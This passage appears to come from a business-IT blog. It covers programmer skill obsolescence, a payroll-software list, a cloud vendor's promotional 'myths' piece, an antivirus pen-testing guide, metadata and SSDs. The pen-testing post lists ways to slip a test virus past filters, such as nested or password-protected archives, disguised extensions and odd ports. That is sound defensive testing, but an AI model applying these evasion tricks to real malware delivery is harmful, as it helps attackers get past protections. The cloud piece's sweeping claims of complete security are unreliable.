So the mainframe folks I mentioned earlier that had the same tasks for 15 or 20 years are likely to be the last of their kind. A lone, overspecialized programmer entering the field today may only get away with her current skill set for 5-10 years. This continual decrease in the longevity of newly learned computing skills agrees with the technological singularity concept, something that might be worth checking out:

http://en.wikipedia.org/wiki/Technological_singularity

What’s the worst that can happen? What’s wrong with sticking to techniques that are “good enough”, and more familiar?

I see possible dangers including a widespread deficit of capable programmers because of overspecialization in now-antiquated technologies (large companies have been using this claim to justify increasing numbers of tech worker visas for decades), and massive amounts of money spent unnecessarily to prop up an aging technology due to internal resistance to change. These ultimately make the entire economy less productive / profitable. That means fewer jobs for everyone and a smaller economy overall as valuable resources are spent in non-productive efforts, trying to catch tempests in cups of various sizes and compositions instead of inventing what’s actually needed for the foreseeable future.

And there’s a long-running developer philosophy that “good enough” techniques really are good enough, as long as you know your options well. That’s not at odds with the value of continual learning, however. Most of the time, “good enough” has to do with a judgement of how much time it would take to implement a more complex solution to a problem, versus choosing a simpler method which has known drawbacks, but will probably not manifest as a problem. Using an old technique to deliver desired functionality faster isn’t inherently wrong, it might be the best way to get the system working as desired. But being unaware of the alternatives for that decision can be costly for many more people than the developer and their employer. Software inadequacies get repeated over and over with growing numbers of people, so a bad decision of one developer can have a disproportionately large impact on the lives of many more people over time.

But more to the point, I don’t think it’s possible to back up a claim that any single software technology will be “good enough” to address a wide variety of problems over a long time span. We’re just not at that stage of technological development yet.

What was your development philosophy when working on CoupSmart, and what kind of results did it bring?

The software development work had already been started by two part-time developers when I joined CoupSmart, so the language had already been chosen, and it was PHP. It’s not my favorite language, but it’s perfectly suitable for modern web apps, so I wasn’t concerned. There’s also an advantage in that more developers fresh out of college have a working knowledge of PHP, whereas fewer are familiar with Ruby, which is the language I might have chosen if the variables had been different.

And although it’s probably too early to tell if our programming language choice had a direct impact on the success of CoupSmart as a company, we are often praised by other entrepreneurs in our circle of friends, their software development teams are working in .Net or Java, and are apparently far less productive given the same resources. So I’ll count that as a tentative win.

Why do you think other developers are so resistant to new ideas?

I think you can answer this with the same reasons people resist change in general. Fear of the unknown, self-doubt, overwhelming choices, etc. It’s really no different. We develop habits because it’s easier than rethinking every single past decision, it’s just faster. But when you fail to reevaluate your prior decisions for too long, there are always consequences as you and the rest of society drift apart ideologically.

One woman that I met through the Guild was a COBOL mainframe programmer who got laid off after over 20 years writing the same kind of code every work day. They replaced the mainframe with a more modern system, and she had not transferred to the team doing the new work. She thought their project would fail, apparently. It certainly could have, lots of software projects fail. But this one didn’t, and she was laid off shortly after the mainframe was decommissioned. She decided that what was so new in modern programming that had been absent in her work was object orientation (aka OO), a layer of abstraction that makes it easier to design large software systems. I encouraged her to learn a new language in order to become familiar with OO concepts, but she seemed afraid somehow. Months later, she told me that she had finally registered for a class in .Net. That would certainly cover OO topics, so I tried to give some positive reinforcement. But I think her conception of how novel this concept was may have gotten in her way of simply using it until she understood it. She remains out of work to this day, over 5 years later.

I’m acquainted with a developer who worked for a competing ad agency. I talked with him over lunch one time, and he admitted rather shyly that he was still doing most of his work in ColdFusion, a programming environment that is arguably not aging very well.  I asked him if he was thinking about trying anything more modern for new projects, and he claimed to have investigated a few other options, but just wasn’t willing to give up his favorite environment, which he just loved and felt very comfortable with. About two years later, I heard that his company had shut down his department and laid him off, not enough clients wanted their work done in ColdFusion any more, and the developer just wasn’t willing to try something else, so they stopped getting new projects, and after a while they couldn’t justify keeping him full-time just for maintenance work on old apps.

Top 21 SaaS Payroll and Online Payroll Software Reviews

  1. PayCom – One of the fastest-growing payroll software companies. They can easily simplify complex payroll processes.
  2. IOI Pay – A national leader in outsourced HR, Payroll and Tax filing. With a handy web-based interface for both employers and employees.
  3. Einstein HR – Highly customizable online HR software, built with HR professionals in mind.
  4. Workday – Advanced payroll software, proudly delivered in the cloud.
  5. Paymate – An online payroll software provider that caters to the unique requirements of Canadians.
  6. Payroll Data – The next level in web-based payroll and HR management software.
  7. Greytip – Payroll software company with an online version. Specializes in companies with up to 30,000 employees.
  8. PayCycle – World-famous payroll software, trusted by over a million companies.
  9. Advantag SBS – Streamlined online payroll with great pricing, great service and great options.
  10. Surepayroll – Award-winning payroll software that well-recognized within the industry.
  11. Amcheck – Secure online payroll processing that caters to medium and large companies.
  12. Paylocity – A company that’s turning the world of SaaS payroll and HR on its head.
  13. Triton HR Web-based payroll software that’s good enough for Fortune 1000 companies.
  14. Simple Payroll – Gives you the power to manage and verify payroll 24 hours a day.
  15. Paycor – An online payroll company that really takes care of their clients.
  16. Patriot Software – Inexpensive payroll software that’s both accurate and fast.
  17. Perfect Software – SAS70 certified SaaS payroll software from an all-in-one online HRIS vendor.
  18. Compupay – Flexible payroll software that’s accessible online, by phone or even by fax.
  19. Epayroll – An Australian vendor of online payroll software as a service.
  20. Evetan – A fast, easy and simple online payroll system. With helpful instructional videos.
  21. WebPayroll – Painless, flexible and secure payroll software. Based out of Australia.

Top 10 Myths and Lies used by installed software vendors to scare you away from the cloud

A lot of the myths below are breaking as more and more cloud applications are demonstrating how there is clearly a more optimum way of doing things. But you still hear the following reasons in enterprise sales pitches. The top 10 myths surrounding cloud applications are listed below, and in each case exactly the opposite is true!

1. Your data is not secure because it’s not on your own server/ laptop

Your data on your or any other server is just as secure. You do trust your bank with your data, right? Your bank and many other such services store your data on servers all over the world. Also, many would argue that your data backed up on secured servers is a lot safer than on your laptop alone. What if you lose your computer?

2. Cloud is not reliable – what if the site is down?

There are two aspects here – the internet connection and the cloud company’s site. Both have a 99.99% uptime rate statistically. In fact, you are more likely to have your installed software crash or have a bug in it, or processes that your IT admin have to keep running on them. Cloud companies are managed by reliable services like Amazon EC2 and many others, who are leaders in online continuity.

3. It’s not scalable – you can’t use the cloud for large operations

Cloud applications are exponentially scalable. Salesforce.com, recruiterbox.com has no limits to their respective usage. You can run a global operation off these systems.

4. The primary reason to use cloud is that it is cheap

Cloud is value for money. It’s not a compromise you make because installed software is more expensive. Cloud is scalable, flexible and can be accessed from anywhere, and one can share the same updated data with others. It runs on the latest technology that keeps getting updated automatically and it is completely secure. It’s a better way to run things.

5. Cloud applications are not as powerful as desktop applications

Cloud applications are extremely powerful in terms of functionality. In fact, they are designed keeping in mind the needs of the entire user base and constantly updated based on feedback from 100s of companies, not just yours. So the result is that you have functionality that your already installed software cannot replicate. It allows you to do more stuff efficiently.

6. Cloud applications are new and untested

Cloud applications are continuously tested even before going live, and are constantly improved. Many companies rely on online applications to a very large degree and in fact to most small companies, the cloud is not a new solution, it’s the only solution.

7. Your data offline is accessible and flexible enough

If you compare both accessibility and flexibility between an offline and online system, you will answer this question yourself. You can access an online application anywhere, from any computer. Whatever changes or updates you make through this are live and complete. This has a much greater impact on the way businesses are run today, and it’s almost necessary in this mobile age when people are working from different places.

8. Cloud companies don’t know enough about your usage

Cloud companies know more about how your company works than any enterprise software company. This is because an enterprise company is selling you what they have built and they might customize it to your current processes, but a cloud company has built a solution ground up based on the input of several companies that have a similar usage to you. So they have the benefit of a wider vision to developing, scaling and improving on a solution constantly just the way you need to use it.

9. Your enterprise installed software is the latest and greatest

An enterprise software company made certain technology choices at inception and once you get used to their system, they provide you with newer versions at regular intervals. But during your usage, you will not have any boost in functionality if there is a better way to do things. For a cloud company, it is possible to improve your user experience because it’s online and they can constantly make your life easier by finding the best way to get something done.

10. It will be simple for established software vendors to give you a SaaS/cloud version of their installed software

The way an installed solution is developed is very different from a cloud one. A cloud one is built ground up with the very purpose of doing things online. It is lean in terms of size to ensure the user can achieve their objective in the fastest and most optimum way. In contrast, an enterprise company cannot take an existing desktop application, which was not built with these considerations, and convert it to an online application.

About The Author: Raj Sheth is the Co-Founder of Recruiterbox.com. Recruiterbox is a cloud-based job application management service that’s used by fast-growing companies like Groupon.

How to Test Your Antivirus, Anti-Malware, Firewall and Network Perimeter Security Devices (Penetration testing and pen tests)

As with any critical security function in IT, you need to test your company’s antivirus and anti-malware protection. It’s not enough to trust your vendor. Even if their products are working perfectly, the implementation might’ve left some holes open in your security.

That’s why you should test the security of your internal network several times per year in order to predict how well it can defend against viruses, malware and other nasty attacks.

The best way to test your network is through penetration testing. (Often called pen testing)

For this article, we’ll only be focusing on the virus/malware area of pen testing. There are other tests that must also be performed as part of a full audit, but we’ll save that for another article.

At first, it may appear that the simplest way to test your security would be to gather up thousands of  nasty viruses, and to set them lose on a network. Then, you can go back and measure the percentage that were blocked in order to determine the effectiveness of your network protection.

However, the results of such a test can be misleading since it might fail to expose critical flaws in your security.

Before attempting this kind of test, you must first check to make sure that your network security is actually working. A better way of doing this would be to test just one simple virus, and alter it in various ways to detect specific vulnerabilities.

You can get a benign test virus here. This file shouldn’t hurt your system, but it SHOULD trigger your antivirus.

Now that you have a virus for testing, you’ll also want to set up an external Linux web server, FTP server and email server to deliver the file. In order to truly test the capabilities of your security, you’ll also want to switch up the ports.

For example, you may want to set up web servers on port 80 and 242. And you may want to set up the POP server on port 110 and another on port 23 – which is normally used for Telnet.

Then, try and push the file into your network using different means, and hiding the file in different ways.

  • Try sending it as a simple email attachment.
  • Try compressing the virus into a ZIP file
  • Try making a ZIP file using a ZIP file containing the virus
  • Try to single and double ZIP the virus, and password-protecting it
  • Try unconventional compression formats like RAR or GZIP
  • Try changing the name of the file
  • Try changing the file extension so that it appears to be another type of document (.PDF, .JPG, .PPT)
  • Embed them into a document such as Word or Excel.

If you use your imagination, you could probably come up with a hundred variations. Once you’ve done this, you’re ready to start testing.

  • Try emailing the file into your network, and also try sending it out from within your network.  Additionally, you’ll want to try sending it internally from one machine to another.
  • Post all of these files up on your web servers and FTP servers, and try downloading all of the files.
  • Set up an online message board on your web server and see if the virus files can be uploaded to the forum as an attachment. Also, try doing the same on your private, intranet if you have one in place.
  • Try downloading the files from other sources, such as Gmail or any other hosted applications that could potentially be used to distribute viruses.

As you grow your options, you’ll develop a wide matrix of potential vulnerabilities. Keep a spreadsheet of your results in order to spot patterns.

Once you’ve broadly secured your network against a single virus, exhaustively tested in every possible way, you’ll have much more to gain from more advanced testing.

Remember Kids: Always test offline, and never compromise a live, critical system.

What is Metadata, and how does it apply to business computing? (Types of Meta Data)

The word “Meta” get thrown around a lot these days. But before I start talking about what meta content is, I’d like to take a moment to discuss what it isn’t.

Specifically, when the term “meta humour” is thrown around, it’s actually a form a “recursive humour”. There is nothing “meta” about it. I’m sorry to be such a stickler, but it just grinds my gears when people use that term in the wrong context.

“Meta Data” is actually a fairly simple concept to understand. This word simply describes data, which gives you more insight into the context of other data.

Dewey Decimal System

The one of the oldest and best-known examples of meta data is the Dewey Decimal System used by public libraries. (Remember those?) The data stored within a library book could be thought of as the primary data. However, the index card relating to that book will contain all sorts of useful meta data:

  • The due date
  • The category
  • Physical location within the library
  • Rental History
  • Author
  • Publication date
  • ISBN number
  • And more

Meta Data In Enterprise Computing

In a similar way, many enterprise search, document management, and archiving applications will store a secondary database along with your flat files in order to improve security, optimize server performance, and provide insight into data usage.

A database index ache of text contained within a series of documents can be searched much more quickly and easily than scanning through each file individually. This can greatly improve search speeds.

Also, companies and organizations can track audit trails to prevent privacy breaches and keep tabs on who’s been accessing which files.

Online Meta Data

Another common example of meta data is right here on the Internet. Within each page, there are hidden documents (like CSS files that tell your browser about how the page is meant to be viewed) and secret header tags (like Meta tags that tell search engines how to classify and rank your site).

Your own computer also contains a lot of Meta data which can be used by web sites. Online advertising companies place cookies on your browser so that they can follow your browsing habits and issue highly targeted ads. Also, the combination of browser, OS, screen resolution, IP address, and plug-in versions can act as a “finger print” which can be used to uniquely identify your machine. This one of the ways online advertising companies prevent click fraud.

Even domain names contain meta data about the web site owner and hosting company. This can be obtained through a WHOIS service.

Meta Data In Plain Files

Another common example of Meta data can be found within the documents you produce and receive. Music and movie files contain hidden meta data about Artist, Genre, Track Names, etc… And picture files contain lots of useful information such as author, GPS, date, etc…

Google Maps uses GPS information contained within pictures to help plot the locations where they were taken. This allows online users to browse pictures by location and go on a virtual sightseeing trip.

Of course, there are also serious privacy and litigation concerns that must be kept in mind.

I was once emailed a supposedly anonymous word document, where the author’s name was written within the document’s meta data.  If this had happened within a highly regulated industry such as the healthcare, military of financial industry, the consequences could’ve been very serious.

The “Creation Date” and “Last Modified Date” meta data obtained from files can also be useful in the courtroom in order to prove or disprove a timeline of events. It can even help your company win a case by demonstrating that a statute of limitations had expired.

Meta data might be out-of-sight, but it should always be to-of-mind. It’s an invisible force that can have a significant impact on the way you do business.

The Difference Between MLC (Multi Level Cell) and SLC (Single Level Cell) SSDs (Solid State Drives)

MDL Technology, LLC is a Kansas City IT company that specializes in worry-free computer support by providing solutions for around-the-clock network monitoring, hosting, data recovery, off site backup security and much more. MDL Technology, LLC is dedicated to helping businesses place time back on their side with quick and easy IT solutions.

Today, I’ll be interviewing TJ Bloom, who is the Chief Operations Officer at MDL Technology. And he’ll be giving us a brief overview of SSD technology.

What is the difference between MLC (Multi Level Cell) and SLC (Single Level Cell) solid state drives?

Multi-Level Cell is a memory technology that stores bits of information in multiple levels in a cell. Because of this, MLC drives have a higher storage density and the per MB manufacturing cost is less but there is a higher chance of error on the drive. This type of drive is typically used in consumer based products. Single Level Cell only stores bits of information on a single level per cell. This decreases power consumption and allows for faster transfer speeds. This technology is typically reserved for higher end or enterprise memory cards where speed and reliability are more important than cost.

How does the endurance of SSD drives compare to traditional hard drives? What factors contribute to SSD durability?

SSD drives are much faster than a traditional HDD. SSD drives use NAND flash memory , which means they have no moving parts. With the removal of moving parts it allows for faster data retrieval times and better stability and durability. Furthermore, SSD drives can withstand a much higher shock rate before sustaining damage to the drive than a HDD. This is due to no moving parts.

What types of solid state drives are best-suited to laptops or typical PC use?

Depending on what you are willing to spend on performance and reliability determines the best drive for your PC. If you replace or purchase a laptop or pc with a  MLC SSD you should see significant performance and reliability increases over a standard HDD in your machines. MLC SSD drives are typically used in PC or non-critical environments. In an enterprise environment and critical environments it is advised to use SLC SSD drives. This will increase performance over a HDD and add speed, durability. A  SSD is also much quieter than HHD.

What types of solid state drives are best-suited to servers?

Intel® X25-E Extreme SATA Solid-State Drive is one option for running your server on SSD drives. This will be much quieter, more stable and faster than your traditional HDD.

What advice can you give for someone looking to get the following benefits from their SSD purchase:

  • Overall Cost – At the server level, the cost of SSD drives is still very expensive compared to HDD.
  • Cost-per-gigabyte - Cost-per-GB for SSD drives can be as low as $1.87 per GB but HDD still makes SSD drives hard to justify coming in at under $.13 per GB.
  • Speed – If you are looking for speed SSD is the way to go.
  • Reliability –It has no moving parts so it has better reliability and longevity.
  • Longevity – It has no moving parts so it has better reliability and longevity.

What are some good general tips for picking the best solid-state drives, or deciding between SSD and traditional hard drives?

I like to read the reviews on what I am purchasing. http://www.ssdreview.com/

This will help you to ask the right questions and help you choose the best options for your application.

How do you see the future for SSD technology?

I think in the future you will start seeing more and more SSD drives built onto the motherboard of the computer. At some point we will be using just one big chip.